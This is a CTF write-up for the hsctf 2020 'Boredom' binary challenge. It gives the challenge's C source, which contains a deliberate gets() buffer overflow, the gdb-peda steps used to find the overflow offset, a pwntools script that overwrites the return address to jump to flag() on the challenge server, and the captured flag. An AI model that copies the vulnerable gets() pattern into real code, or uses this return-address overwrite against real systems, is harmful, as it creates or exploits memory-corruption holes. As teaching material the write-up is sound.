## Boredom

* **CTF:** hsctf 2020 
* **Category:** binary
* **Points:** 100
* **Author(s):** b0uldrr
* **Date:** 04/06/20

---

### Challenge
```
Keith is bored and stuck at home. Give him some things to do.

Connect at nc pwn.hsctf.com 5002.

Note, if you're having trouble getting it to work remotely:

    check your offset, the offset is slightly different on the remote server
    the addresses are still the same

Author: PMP
```

### Downloads
* [boredom](boredom)
* [boredom.c](boredom.c)

---

### Solution

Source code:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <signal.h>

void setup() {
  puts("I'm currently bored out of my mind. Give me something to do!");
  setvbuf(stdin, NULL, _IONBF, NULL);
  setvbuf(stdout, NULL, _IONBF, NULL);
}

void flag() {
  FILE *f = fopen("flag.txt", "r");
  char buf[50];
  if (f == NULL) {
    puts("You're running this locally or I can't access the flag file for some reason.");
    puts("If this occurs on the remote, ping @PMP#5728 on discord server.");
    exit(1);
  }
  fgets(buf, 50, f);
  printf("Hey, that's a neat idea. Here's a flag for your trouble: %s\n",
    buf);
  puts("Now go away.");
  exit(42);
}

int main() {
  char toDo[200];
  setup();

  printf("Give me something to do: ");
  gets(toDo);
  puts("Ehhhhh, maybe later.");
  return 0;
}
```
Generic `gets` overflow problem. Find the overflow offset with gdb_peda:

```
gdb-peda$ create pattern 400 > overflow.txt
gdb-peda$ r < overflow.txt
gdb-peda$ x/wx $rsp
0x7fffffffe118: 0x4325416e
gdb-peda$ pattern_offset 0x4325416e
1126515054 found at offset: 216
```
My solution in python:

```python
#! /usr/bin/python3

import pwn

# 00000000004011d5 <flag>

local = False

# offset was slightly different on challenge server
if local:
    conn = pwn.process('./boredom')
    overflow = 216
else:
    conn = pwn.remote('pwn.hsctf.com', 5002)
    overflow = 208

payload  = b'a' * overflow	# fill the buffer
payload += pwn.p64(0x4011d5)	# overwrite return address with the flag address

conn.recvuntil('to do: ')
conn.sendline(payload)
print(conn.recvall().decode())
```
The result:

```
 ./soln.py 
[+] Opening connection to pwn.hsctf.com on port 5002: Done
[+] Receiving all data: Done (134B)
[*] Closed connection to pwn.hsctf.com port 5002
Ehhhhh, maybe later.
Hey, that's a neat idea. Here's a flag for your trouble: flag{7h3_k3y_l0n3l1n355_57r1k35_0cff9132}

Now go away.
```

---

### Flag 
```
flag{7h3_k3y_l0n3l1n355_57r1k35_0cff9132}
```
